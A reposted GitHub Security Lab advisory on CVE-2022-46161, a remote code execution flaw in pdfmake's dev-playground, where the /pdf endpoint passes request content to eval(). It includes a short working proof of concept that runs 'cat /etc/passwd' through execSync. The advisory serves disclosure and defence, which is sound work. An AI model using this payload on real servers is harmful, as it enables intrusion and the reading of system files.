GHSL-2022-068: Remote Code Execution (RCE) in PDFMake – CVE-2022-46161

渗透技巧 1年前 (2022) admin
578 0 0

Coordinated Disclosure Timeline

Summary

The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).

Product

pdfmake

Tested Version

0.2.5

Details

Issue: RCE in dev-playground.js (GHSL-2022-068)

The /pdf endpoint in charge of creating a PDF from a given JS code does not sanitize user-input, nor does the execution take place in a sandboxed environment.

app.post('/pdf', function (req, res) {
	eval(req.body.content);

Impact

This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.

Resources

  • CWE-94: Improper Control of Generation of Code (‘Code Injection’)
  • CWE-400: Uncontrolled Resource Consumption
POC

Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF doc:

const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
    content: [
        out.toString()
        ]
}

CVE

  • CVE-2022-46161

Credit

This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).

Contact

You can contact the GHSL team at [email protected], please include a reference to GHSL-2022-068 in any communication regarding this issue.

 

版权声明:admin 发表于 2022年12月8日 下午3:22。
转载请注明:GHSL-2022-068: Remote Code Execution (RCE) in PDFMake – CVE-2022-46161 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...